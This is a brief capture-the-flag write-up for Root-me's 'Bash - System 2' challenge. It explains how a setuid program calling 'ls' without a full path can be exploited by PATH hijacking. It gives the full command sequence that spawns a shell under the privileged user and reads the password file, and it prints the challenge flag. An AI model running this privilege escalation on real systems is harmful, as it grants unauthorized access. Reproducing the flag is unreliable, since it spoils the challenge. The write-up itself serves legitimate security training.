Root-me.org

Bash - System 2

Simple Script

Once again we need to get the content of .passwd. This time the script uses ls with some options.

int main(){
	system("ls -lA /challenge/app-script/ch12/.passwd");
	return 0;
}

We can’t use the previous method because of the options. So this time, we’ll use /bin/sh to create a new shell with the id of app-script-ch12-cracked.

We’ll be creating an executable command called ls that contains /bin/sh. We’re using /bin/sh because it doesn’t drop permissions like bash does.

So since the setuid is set, we’ll get a shell from the user executing the script which is app-script-ch12-cracked.

-r-sr-x---  1 app-script-ch12-cracked app-script-ch12         7.0K Aug 11  2015 ch12

So we’ll create a new folder, set it to our path then create our new ls.

mkdir -p /tmp/mine
echo "/bin/sh;" > /tmp/mine/ls
chmod +x /tmp/mine/ls
export PATH=/tmp/mine:$PATH

./ch12

id
uid=1312(app-script-ch12) gid=1312(app-script-ch12) euid=1409(app-script-ch12-cracked) groups=1409(app-script-ch12-cracked),100(users),1312(app-script-ch12)

cat .passwd
8a95eDS/*e_T#